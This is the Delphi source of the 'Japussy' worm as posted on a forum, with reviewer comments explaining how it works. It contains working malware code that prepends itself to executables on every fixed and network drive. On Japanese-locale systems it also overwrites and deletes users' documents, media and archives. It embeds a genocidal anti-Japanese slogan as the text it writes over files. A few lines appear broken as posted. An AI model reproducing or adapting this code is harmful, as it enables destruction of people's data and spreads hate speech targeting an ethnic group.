
LRYGOGO - 2007-7-6 18:49:00
program japussy;
uses
windows, sysutils, classes, graphics, shellapi{, registry};
const
{ Number of leading bytes of the running executable that are treated as the
  viral body: extractfile copies everything after this offset out as the
  original host, and infectonefile prepends exactly this many bytes of the
  running image to a target. }
headersize = 82432;            iconoffset = $12eb8;         
{
headersize = 38912;           
iconoffset = $92bc;           

//upx 1.24w usage: upx -9 --8086 japussy.exe
}
{ Offset and size inside the viral body where infectonefile writes the
  target's extracted icon (presumably so the infected file keeps the host's
  original icon). }
iconsize  = $2e8;           
icontail  = iconoffset + iconsize;
{ 4-byte marker appended to the end of every infected file; infectonefile
  reads the last 4 bytes of a candidate and skips files that already carry it.
  This trailing value is an observable indicator of an infected file. }
id      = $44444444;       

//garbage text; smashfile writes it over files before deleting them
catchword = 'if a race need to be killed out, it must be yamato. ' +
        'if a country need to be destroyed, it must be japan! ' +
        '*** w32.japussy.worm.a ***';
{$r *.res}
{ Win9x-only kernel32 export; the main block calls it with dwtype = 1 when
  iswin9x reports true. }
function registerserviceprocess(dwprocessid, dwtype: integer): integer; 
stdcall; external 'kernel32.dll';
var
tmpfile: string;       // path of the carved-out host, built in the main block
si:    startupinfo;    // filled by fillstartupinfo before createprocess
pi:    process_information;
isjap:  boolean = false; // set by infectfiles when getacp returns 932
{ Returns true when GetVersionEx reports platform id VER_PLATFORM_WIN32_WINDOWS
  (Win9x). Returns false for any other platform, and also when GetVersionEx
  itself fails. }
function iswin9x: boolean;
var
ver: tosversioninfo;
begin
result := false;
ver.dwosversioninfosize := sizeof(tosversioninfo);
if not getversionex(ver) then
  exit;
if (ver.dwplatformid = ver_platform_win32_windows) then //win9x
  result := true;
end;
{ Copies count bytes from src (starting at sstartpos) into dst (starting at
  dstartpos), then restores both streams' previous positions. }
procedure copystream(src: tstream; sstartpos: integer; dst: tstream;
dstartpos: integer; count: integer);
var
scurpos, dcurpos: integer;
begin
scurpos := src.position;
dcurpos := dst.position;
src.seek(sstartpos, 0);
dst.seek(dstartpos, 0);
dst.copyfrom(src, count);
src.seek(scurpos, 0);
dst.seek(dcurpos, 0);
end;
{ Separates the host program from the infected executable: copies every byte
  of the running executable (paramstr(0)) past headersize into filename.
  Any exception is swallowed by the empty except block, so failure is silent. }
procedure extractfile(filename: string);
var
sstream, dstream: tfilestream;
begin
try
  sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
  try
    dstream := tfilestream.create(filename, fmcreate);
    try
    sstream.seek(headersize, 0);
    dstream.copyfrom(sstream, sstream.size - headersize);
    finally
    dstream.free;
    end;
  finally
    sstream.free;
  end;
except
end;
end;
{ Prepares a STARTUPINFO record for createprocess: sets the pointer fields to
  nil, cbreserved2 to 0, and requests the given window show state via
  STARTF_USESHOWWINDOW. Fields not listed here are left as the caller passed them. }
procedure fillstartupinfo(var si: startupinfo; state: word);
begin
si.cb := sizeof(si);
si.lpreserved := nil;
si.lpdesktop := nil;
si.lptitle := nil;
si.dwflags := startf_useshowwindow;
si.wshowwindow := state;
si.cbreserved2 := 0;
si.lpreserved2 := nil;
end;
{ Mail-spreading routine (original comment: "send infected mail"). The body is
  empty as posted, so calling it has no effect. }
procedure sendmail;
begin
end;
{ Infects one PE file: filename is rewritten in place as
  [viral body with the target's icon patched in] + [original file] + [id marker].
  The file is left alone when filename equals 'japussy.exe' (case-insensitive),
  when its last 4 bytes already equal id, when it is smaller than 10240 bytes,
  or when no 'PE' signature is found in its first $109 bytes.
  Every exception is swallowed by the outer except. }
procedure infectonefile(filename: string);
var
hdrstream, srcstream: tfilestream;
icostream, dststream: tmemorystream;
iid: longint;
aicon: ticon;
infected, ispe: boolean;
i: integer;
buf: array[0..1] of char;
begin
try
  if comparetext(filename, 'japussy.exe') = 0 then
    exit;
  infected := false;
  ispe  := false;
srcstream := tfilestream.create(filename, fmopenread);
  try
    // Look for the 'PE' signature (#80 #69 = 'P','E') at any offset 0..$108.
    for i := 0 to $108 do
    begin
    srcstream.seek(i, sofrombeginning);
    srcstream.read(buf, 2);
    if (buf[0] = #80) and (buf[1] = #69) then //PE marker
    begin
      ispe := true; //it is a PE file
      break;
    end;
    end;
    // The last 4 bytes carry the infection marker on an already-infected
    // file; files under 10240 bytes are treated as infected too, i.e. skipped.
    srcstream.seek(-4, sofromend);
    srcstream.read(iid, 4);
    if (iid = id) or (srcstream.size < 10240) then
    infected := true;
  finally
    srcstream.free;
  end;
  if infected or (not ispe) then
    exit;
  icostream := tmemorystream.create;
  dststream := tmemorystream.create;
  try
    // Extract the target's first icon into icostream (.ico format).
    aicon := ticon.create;
    try
    aicon.releasehandle;
    aicon.handle := extracticon(hinstance, pchar(filename), 0);
    aicon.savetostream(icostream);
    finally
    aicon.free;
    end;
    srcstream := tfilestream.create(filename, fmopenread);
    hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
    try
    // Assemble the new image in memory: own header up to the icon slot, the
    // icon data from icostream (skipping its first 22 bytes -- presumably the
    // .ico directory header), the rest of own header, then the whole host.
    copystream(hdrstream, 0, dststream, 0, iconoffset);
    copystream(icostream, 22, dststream, iconoffset, iconsize);
    copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);
    copystream(srcstream, 0, dststream, headersize, srcstream.size);
    // Append the infection marker (same value as the id constant) at the end.
    dststream.seek(0, 2);
    iid := $44444444;
    dststream.write(iid, 4);
    finally
    hdrstream.free;
    end;
  finally
    srcstream.free;
    icostream.free;
    // NOTE(review): savetofile runs in the finally, so the target is
    // overwritten even when an exception interrupted the assembly above.
    dststream.savetofile(filename);
    dststream.free;
  end;
except;
end;
end;
{ Destroys a file: clears its attribute bits, overwrites it with catchword at
  max evenly spaced offsets (max = random(15), raised to at least 5), then
  deletes it. Exceptions are swallowed by the empty except. }
procedure smashfile(filename: string);
var
filehandle: integer;
i, size, mass, max, len: integer;
begin
try
  setfileattributes(pchar(filename), 0); // clear all attribute bits (read-only etc.)
  filehandle := fileopen(filename, fmopenwrite);
  try
    size := getfilesize(filehandle, nil);
    i := 0;
    randomize;
    max := random(15);
    if max < 5 then
    max := 5;
    mass := size div max; // spacing between successive overwrite positions
    len := length(catchword);
    while i < max do
    begin
    fileseek(filehandle, i * mass, 0);
    filewrite(filehandle, catchword, len);
    inc(i);
    end;
  finally
    fileclose(filehandle);
  end;
  deletefile(pchar(filename));
except
end;
end;
{ Returns the letters (A..Z) of every drive that GetDriveType reports as
  DRIVE_FIXED or DRIVE_REMOTE, concatenated into one string. The original
  comment calls these the "writable drives".
  NOTE(review): result is appended to without an explicit initialisation;
  whether it starts out empty depends on the compiler's handling of string
  results. }
function getdrives: string;
var
disktype: word;
d: char;
str: string;
i: integer;
begin
for i := 0 to 25 do
begin
  d := chr(i + 65);
  str := d + ':\';
  disktype := getdrivetype(pchar(str));
    if (disktype = drive_fixed) or (disktype = drive_remote) then
    result := result + d;
end;
end;
{ Recursively walks path (expected to end in '\'), matching mask in each
  directory: entries with extension .exe/.scr go to infectonefile, and -- only
  when isjap is true -- entries with the document/media extensions listed in
  the final branch go to smashfile. The .htm/.html/.asp, .wab, .adc and ind
  branches are empty as posted. After the file pass, subdirectories are
  collected and each is recursed into.
  NOTE(review): the listing as posted is entirely lower-case (apparently
  normalised by the forum); the extension comparisons below uppercase ext
  first, so read them with that in mind. }
procedure loopfiles(path, mask: string);
var
i, count: integer;
fn, ext: string;
subdir: tstrings;
searchrec: tsearchrec;
msg: tmsg;
{ Classifies a search result: 0 = not a directory, 1 = a directory other than
  '.'/'..', 2 = the '.' or '..' entry. Attr is compared with 16 (faDirectory)
  exactly, so a directory that also carries other attribute bits lands in 0. }
function isvaliddir(searchrec: tsearchrec): integer;
begin
  if (searchrec.attr <> 16) and (searchrec.name <> '.') and
    (searchrec.name <> '..') then
    result := 0 //not a directory
  else if (searchrec.attr = 16) and (searchrec.name <> '.') and
    (searchrec.name <> '..') then
    result := 1 //a directory other than '.' / '..'
  else result := 2; //the '.' or '..' entry
end;
begin
if (findfirst(path + mask, faanyfile, searchrec) = 0) then
begin
  repeat
    peekmessage(msg, 0, 0, 0, pm_remove); // drain the message queue while scanning
    if isvaliddir(searchrec) = 0 then
    begin
    fn := path + searchrec.name;
    ext := uppercase(extractfileext(fn));
    if (ext = '.exe') or (ext = '.scr') then
    begin
      infectonefile(fn); //infect executables
    end
    else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then
    begin
          end //web pages: no action as posted
    else if ext = '.wab' then //outlook address book file: no action as posted
    begin
     
    end
    else if ext = '.adc' then //foxmail address auto-complete file: no action as posted
    begin
     
    end
    else if ext = 'ind' then //foxmail address book file (compared without a leading dot as posted): no action
    begin
     
    end
    else 
    begin
      // Destructive branch: only taken when the system code page is 932 (isjap).
      if isjap then
      begin
        if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or
        (ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or
        (ext = '.wma') or (ext = '.zip') or (ext = '.rar') or
        (ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or
        (ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or
        (ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then
          smashfile(fn);
      end;
    end;
    end;
        sleep(200); // 200 ms pause after every directory entry
  until (findnext(searchrec) <> 0);
end;
findclose(searchrec);
// Second pass: collect subdirectory names, then recurse into each one.
subdir := tstringlist.create;
if (findfirst(path + '*.*', fadirectory, searchrec) = 0) then
begin
  repeat
    if isvaliddir(searchrec) = 1 then
    subdir.add(searchrec.name);
  until (findnext(searchrec) <> 0);
  end;
findclose(searchrec);
count := subdir.count - 1;
for i := 0 to count do
  // NOTE(review): subdir.strings appears here without an index as posted, so
  // this line does not compile as shown; the index was probably lost in the
  // forum rendering.
  loopfiles(path + subdir.strings + '\', mask);
freeandnil(subdir);
end;
{ Main infection loop: sets isjap when the ANSI code page is 932 (Japanese),
  reads the drive list once, then forever walks the drives with loopfiles,
  calls sendmail, and sleeps five minutes. Never returns. }
procedure infectfiles;
var
driverlist: string;
i, len: integer;
begin
if getacp = 932 then
  isjap := true;! // NOTE(review): stray '!' as posted, likely a transcription artifact
driverlist := getdrives;
len := length(driverlist);
while true do
begin
  // NOTE(review): driverlist is passed whole, without a per-letter index, as
  // posted; the index expression was probably lost in the forum rendering.
  for i := len downto 1 do
    loopfiles(driverlist + ':\', '*.*');
  sendmail;
  sleep(1000 * 60 * 5); // five minutes between sweeps
end;
end;
{ Program entry point. On Win9x the process registers itself via
  registerserviceprocess (dwtype = 1); the WinNT branch is empty. When the
  executable is itself named japussy.exe it goes straight into infectfiles;
  otherwise it is running as an infected host: the host is carved out to a
  second path derived from paramstr(0), launched with createprocess, and only
  then does infectfiles run. }
begin
if iswin9x then //Win9x
  registerserviceprocess(getcurrentprocessid, 1) else //WinNT: nothing to do
begin
  end;

if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then
  infectfiles
else
begin
  tmpfile := paramstr(0);
  delete(tmpfile, length(tmpfile) - 4, 4); // drops 4 chars starting at position length-4
  tmpfile := tmpfile + #32 + '.exe';        // appends a space followed by '.exe'
  extractfile(tmpfile); //carve the original host out of this image
  fillstartupinfo(si, sw_showdefault);
  // bInheritHandles = true, no creation flags, current directory '.'.
  createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,
    0, nil, '.', si, pi);
  infectfiles;
end;
end.